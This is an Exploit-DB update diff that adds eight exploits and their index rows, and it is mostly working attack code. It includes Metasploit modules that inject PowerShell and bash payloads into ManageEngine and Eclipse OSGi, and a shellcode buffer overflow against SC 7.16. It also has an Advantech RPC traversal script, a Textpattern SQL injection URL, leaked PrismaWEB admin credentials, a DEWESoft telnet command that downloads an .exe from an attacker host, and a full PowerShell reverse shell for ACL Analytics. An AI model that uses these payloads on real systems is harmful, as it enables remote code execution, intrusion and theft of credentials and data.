DB: 2018-03-13

8 changes to exploits/shellcodes

Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader
Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader

SC 7.16 - Stack-Based Buffer Overflow

DEWESoft X3 SP1 (64-bit) - Remote Command Execution

Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)

ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials
TextPattern 4.6.2 - 'qty' SQL Injection
Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution
ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution

exploits/java/webapps/44274.rb

@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager Remote Code Execution",
+      'Description'    => %q{
+        This module exploits command injection vulnerability in the ManageEngine Application Manager product.
+        An unauthenticated user can execute a operating system command under the context of privileged user.
+
+        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
+        by accessing given system. This endpoint calls a several internal classes and then executes powershell script
+        without validating user supplied parameter when the given system is OfficeSharePointServer.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-7890'],
+          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 10,
+          'RPORT' => 9090
+        },
+      'Payload' =>
+        {
+          'BadChars' => "\x22"
+        },
+      'Platform'       => ['win'],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'         => [ ['Automatic', {}] ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 7 2018',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
+      'vars_post' => {
+        'method' => 'testCredentialForConfMonitors',
+        'type' => 'OfficeSharePointServer',
+        'montype' => 'OfficeSharePointServer',
+        'isAgentEnabled' => 'NO',
+        'isAgentAssociated' => 'false',
+        'displayname' => Rex::Text.rand_text_alpha(10),
+        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
+        'Version' => '2013',
+        'Powershell' => 'True', # :-)
+        'CredSSP' => 'False',
+        'SPType' => 'SPServer',
+        'CredentialDetails' => 'nocm',
+        'Password' => Rex::Text.rand_text_alpha(3),
+        'UserName' => Rex::Text.rand_text_alpha(3)
+      }
+    })
+    if res && res.body.include?('Kindly check the credentials and try again')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    powershell_options = {
+      encode_final_payload: true,
+      remove_comspec: true
+    }
+    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
+
+    print_status('Triggering the vulnerability')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
+      'vars_post' => {
+        'method' => 'testCredentialForConfMonitors',
+        'type' => 'OfficeSharePointServer',
+        'montype' => 'OfficeSharePointServer',
+        'isAgentEnabled' => 'NO',
+        'isAgentAssociated' => 'false',
+        'displayname' => Rex::Text.rand_text_alpha(10),
+        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
+        'Version' => '2013',
+        'Powershell' => 'True', # :-)
+        'CredSSP' => 'False',
+        'SPType' => 'SPServer',
+        'CredentialDetails' => 'nocm',
+        'Password' => Rex::Text.rand_text_alpha(3),
+        'UserName' => "$(#{p})"
+      }
+    })
+
+  end
+end

exploits/linux/local/44279.py

@@ -0,0 +1,78 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
+# Bug found using Exploit Pack - Local fuzzer feature.
+#
+# Tested on: GNU/Linux - Kali Linux
+# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb
+#
+# Description: SC v7.16 is prone to a basic stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: SC v7.16 -
+http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html
+#
+#
+#[----------------------------------registers-----------------------------------]
+#EAX: 0x0
+#EBX: 0x41414141 ('AAAA')
+#ECX: 0x42 ('B')
+#EDX: 0x1
+#ESI: 0x41414141 ('AAAA')
+#EDI: 0x41414141 ('AAAA')
+#EBP: 0x41414141 ('AAAA')
+#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg     0xb7fd9047)
+#EIP: 0x41424344 ('DCBA')
+#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT
+direction overflow)
+#[-------------------------------------code-------------------------------------]
+#Invalid $PC address: 0x41424344
+#[------------------------------------stack-------------------------------------]
+#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg     0xb7fd9047)
+#0004| 0xbfffee34 --> 0x1
+#0008| 0xbfffee38 --> 0x0
+#0012| 0xbfffee3c --> 0x0
+#0016| 0xbfffee40 --> 0xf63d4e2e
+#0020| 0xbfffee44 --> 0xb7fe4bf9 (<do_lookup_x+1689>: add    esp,0x20)
+#0024| 0xbfffee48 --> 0x1
+#0028| 0xbfffee4c --> 0x1
+#[------------------------------------------------------------------------------]
+#Legend: code, data, rodata, value
+#Stopped reason: SIGSEGV
+#0x41424344 in ?? ()
+#gdb-peda$ backtrace
+##0  0x41424344 in ?? ()
+##1  0xbffff100 in ?? ()
+#Backtrace stopped: previous frame inner to this frame (corrupt stack?)
+#gdb-peda$
+#
+#==2332==
+#==2332== Jump to the invalid address stated on the next line
+#==2332==    at 0x41424344: ???
+#==2332==  Address 0x41424344 is not stack'd, malloc'd or (recently) free'd
+#==2332==
+#==2332==
+#==2332== Process terminating with default action of signal 11 (SIGSEGV)
+#==2332==  Access not within mapped region at address 0x41424344
+#==2332==    at 0x41424344: ???
+import subprocess
+import os
+
+buffersize =  1052
+nopsled = "\x90"
+# Shell
+shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+eip = "\x10\xf0\xff\xbf"
+buffer = nopsled * (buffersize-len(shellcode)) + eip
+
+try:
+   subprocess.call(["/usr/bin/sc", buffer])
+except OSError as e:
+   if e.errno == os.errno.ENOENT:
+       print "SC binary not found!"
+   else:
+    print "Error executing exploit"
+   raise

exploits/multiple/remote/44280.rb

@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  TELNET_IAC = Msf::Exploit::Remote::Telnet
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Eclipse Equinoxe OSGi Console Command Execution',
+      'Description'    => %q{
+        Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
+        'fork' command to execute arbitrary commands on the remote system..
+      },
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin@gmail.com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+       [
+         ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
+       ],
+      'Platform' => %w{ linux win },
+      'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
+      'Targets'=> [
+        [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
+        [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
+       ],
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'DisclosureDate'  => 'Feb 13 2018',
+      'DefaultTarget'   => 0))
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
+    register_options([
+      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
+    ])
+  end
+
+  def check
+    connect
+    res = sock.get_once
+    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
+        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
+      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
+      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
+        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
+      res = sock.get_once
+    end
+    disconnect
+    if res && res == "osgi> "
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    begin
+      print_status("Accessing the OSGi console ...")
+
+      unless check == Exploit::CheckCode::Vulnerable
+        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
+      end
+
+      if target['Platform'] == "win" then
+        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
+      else
+        execute_cmdstager({:flavor => :bourne})
+      end
+
+      print_status("#{rhost}:#{rport} - Waiting for session...")
+
+      (datastore['TIME_WAIT']).times do
+        Rex.sleep(1)
+        # Success! session is here!
+        break if session_created?
+      end
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
+    ensure
+      disconnect
+    end
+  end
+
+  def exec_command(cmd)
+      connect
+      res = sock.get_once
+      if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
+        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
+        sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
+          "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
+        res = sock.get_once
+      end
+      print_status("Exploiting...")
+      sock.put("#{cmd}\r\n")
+      res = sock.get
+      sock.put("disconnect\r\n")
+      res = sock.get
+      sock.put("y\r\n")
+  end
+
+  def execute_command(cmd, opts={})
+    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
+    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
+    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
+  end
+end

exploits/multiple/webapps/44276.txt

@@ -0,0 +1,36 @@
+Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
+
+
+Vendor: Prisma Industriale S.r.l.
+Product web page: https://www.prismaindustriale.com
+Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
+
+Summary: Web Administration of Machine.
+
+Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
+an attacker to effectively bypass authentication of PrismaWEB with administrator
+privileges. The credentials can be disclosed by simply navigating to the login_par.js
+JavaScript page that holds the username and password for the management interface that
+are being used via the Login() function in /scripts/functions_cookie.js script.
+
+Tested on: HMS AnyBus-S WebServer
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5453
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
+
+06.02.2018
+
+---
+
+
+$ curl http://10.10.10.70/user/scripts/login_par.js
+// JavaScript Document
+// 11 Dicembre 2009 Release 1.0 Rev.10
+
+var txtChkUser				= "prismaweb";	// Nome utente Login
+var txtChkPassword 			= "prisma";		// Password Login

exploits/php/webapps/44277.txt

@@ -0,0 +1,87 @@
+=============================================
+MGC ALERT 2018-002
+- Original release date: February 12, 2018
+- Last revised:  March 12, 2018
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+- CVE-ID: CVE-2018-7474
+=============================================
+
+I. VULNERABILITY
+-------------------------
+SQL Injection in Textpattern <= 4.6.2
+
+II. BACKGROUND
+-------------------------
+Textpattern is a free and open-source content management system (CMS) based
+on PHP and MySQL, originally developed by Dean Allen and now developed by
+Team Textpattern.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal with authentication as administrator.
+
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+It is possible to inject SQL code in the variable "qty" on the page
+"index.php".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL's and parameters have been confirmed to all suffer from
+SQL injection.
+
+/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
+
+Note: the variable "_txp_token" doest not work as a anti-csrf.
+
+POC:
+
+/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'%
+5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Textpattern <= 4.6.2
+
+VII. SOLUTION
+-------------------------
+Disable website until a fix is available.
+
+VIII. REFERENCES
+-------------------------
+https://textpattern.com/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+February 12, 2018 1: Initial release
+March 12, 2018 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
+February 12, 2018 2: Send to vendor without response
+February 26, 2018 3: Second email to vendor without response
+March 12, 2018 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

exploits/windows/remote/44275.txt

@@ -0,0 +1,100 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
+[+] ISR: Apparition Security          
+ 
+
+
+Vendor:
+=============
+www.dewesoft.com
+
+
+Product:
+===========
+DEWESoft X3 SP1 (64-bit) installer - X3
+DEWESoft_FULL_X3_SP1_64BIT.exe
+
+
+
+Vulnerability Type:
+===================
+Remote Internal Command Access
+
+
+
+CVE Reference:
+==============
+CVE-2018-7756
+
+
+
+Security Issue:
+================
+The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
+for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
+RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run 
+a "SETFIREWALL Off" command. 
+
+The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
+
+Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
+
+RUN <ANY EXE>
+RUNEX <ANY EXE>
+GETFIREWALL
+SETFIREWALL Off
+KILL <PROCESS>
+USERNAME
+SHUTDOWN
+SENDKEYS
+LIST
+DWPIPE
+
+Exploit/POC:
+=============
+TELNET x.x.x.x 1999 
+RUN calc.exe
+
+OR
+
+Launch the victims browser and send them to website for a drive-by download etc.
+
+TELNET x.x.x.x 1999 
+RUN http://ATTACKER-IP/DOOM.exe
+
+Then from the TELNET session execute it from Downloads directory.
+
+runexe c:\Users\victim\Downloads\DOOM.exe
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 9, 2018
+Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
+Inform vendor of disclosure timeline : February 19, 2018
+No further replys, update or addressing of the issue by vendor.
+Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
+March 10, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).

exploits/windows/webapps/44278.py

@@ -0,0 +1,74 @@
+#!/usr/bin/python2.7
+  
+# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
+# Date: 03-11-2018
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.advantech.com
+# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
+# Version: Advantech WebAccess 8.2-2017.08.18
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2017-16720
+# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
+
+import sys, struct
+from impacket import uuid
+from impacket.dcerpc.v5 import transport
+
+def call(dce, opcode, stubdata):
+  dce.call(opcode, stubdata)
+  res = -1
+  try:
+    res = dce.recv()
+  except Exception, e:
+    print "Exception encountered..." + str(e)
+    sys.exit(1)
+  return res
+
+if len(sys.argv) != 2:
+  print "Provide only host arg"
+  sys.exit(1)
+
+port = 4592
+interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
+version = "1.0" 
+
+host = sys.argv[1]
+
+string_binding = "ncacn_ip_tcp:%s" % host
+trans = transport.DCERPCTransportFactory(string_binding)
+trans.set_dport(port)
+
+dce = trans.get_dce_rpc()
+dce.connect()
+
+print "Binding..."
+iid = uuid.uuidtup_to_bin((interface, version))
+dce.bind(iid)
+
+print "...1"
+stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
+call(dce, 2, stubdata)
+
+print "...2"
+stubdata = struct.pack("<I", 0x02)
+res = call(dce, 4, stubdata)
+if res == -1:
+  print "Something went wrong"
+  sys.exit(1)
+res = struct.unpack("III", res)
+
+if (len(res) < 3):
+  print "Received unexpected length value"
+  sys.exit(1)
+
+print "...3"
+# ioctl 0x2711
+stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
+command = "..\\..\\windows\\system32\\calc.exe"
+fmt = "<" + str(0x204) + "s"
+stubdata += struct.pack(fmt, command)
+call(dce, 1, stubdata)
+
+print "\nDid it work?"
+
+dce.disconnect()

exploits/windows/webapps/44281.txt

@@ -0,0 +1,90 @@
+# Exploit Title: Arbitrary Code Execution
+# Google Dork: N/A
+# Date: 03-07-2018
+# Exploit Author: Clutchisback1
+# Vendor Homepage: https://www.acl.com
+# Software Link: https://www.acl.com/products/acl-analytics/
+# Version: 11.x - 13.0.0.579
+# Tested on: Windows 7 pro SP1 x86
+
+#########################################################################
+#                    
+#                
+#   Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
+#   Welcome to A_C_SHELLLLLL!! 
+#   All Glory to Yeshua
+#   Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
+#   and my Offsec Mentor: T0w3ntum introducing me to netsec!
+#   (I have consent for those mentions :D)
+#                
+#                 
+#########################################################################
+
+
+EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
+
+
+EXECUTE "powershell C:\temp\shell.ps1"
+
+Description/Usage:
+Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
+The second `Execute` command will execute the stored payload
+
+
+Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
+
+$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
+if($socket -eq $null){exit 1}
+$stream = $socket.GetStream();
+$writer = new-object System.IO.StreamWriter($stream);
+$buffer = new-object System.Byte[] 1024;
+$encoding = new-object System.Text.AsciiEncoding;
+do
+{
+ $writer.Flush();
+ $read = $null;
+ $res = ""
+ while($stream.DataAvailable -or $read -eq $null) {
+  $read = $stream.Read($buffer, 0, 1024)
+ }
+ $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
+ if(!$out.equals("exit")){
+  $args = "";
+  if($out.IndexOf(' ') -gt -1){
+   $args = $out.substring($out.IndexOf(' ')+1);
+   $out = $out.substring(0,$out.IndexOf(' '));
+   if($args.split(' ').length -gt 1){
+                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
+                $pinfo.FileName = "cmd.exe"
+                $pinfo.RedirectStandardError = $true
+                $pinfo.RedirectStandardOutput = $true
+                $pinfo.UseShellExecute = $false
+                $pinfo.Arguments = "/c $out $args"
+                $p = New-Object System.Diagnostics.Process
+                $p.StartInfo = $pinfo
+                $p.Start() | Out-Null
+                $p.WaitForExit()
+                $stdout = $p.StandardOutput.ReadToEnd()
+                $stderr = $p.StandardError.ReadToEnd()
+                if ($p.ExitCode -ne 0) {
+                    $res = $stderr
+                } else {
+                    $res = $stdout
+                }
+   }
+   else{
+    $res = (&"$out" "$args") | out-string;
+   }
+  }
+  else{
+   $res = (&"$out") | out-string;
+  }
+  if($res -ne $null){
+        $writer.WriteLine($res)
+    }
+ }
+}While (!$out.equals("exit"))
+$writer.close();
+$socket.close();
+$stream.Dispose()
+END

files_exploits.csv

@@ -9573,7 +9573,7 @@ id,file,description,date,author,type,platform,port
 44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
 44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2  (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
-44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
+44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware,
 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
 38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
@@ -9587,6 +9587,7 @@ id,file,description,date,author,type,platform,port
 44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
 44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
 44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
+44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16064,6 +16065,7 @@ id,file,description,date,author,type,platform,port
 43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
 43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
 43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
+44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows,
 43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
 43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
 43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876
@@ -16318,6 +16320,7 @@ id,file,description,date,author,type,platform,port
 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
 44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
+44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38743,6 +38746,7 @@ id,file,description,date,author,type,platform,port
 42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
 42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
 42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
+44274,exploits/java/webapps/44274.rb,"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)",2018-03-12,"Mehmet Ince",webapps,java,
 42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
 42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
 42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",webapps,php,
@@ -38973,6 +38977,7 @@ id,file,description,date,author,type,platform,port
 44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
 44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
+44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
 44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
@@ -38987,3 +38992,6 @@ id,file,description,date,author,type,platform,port
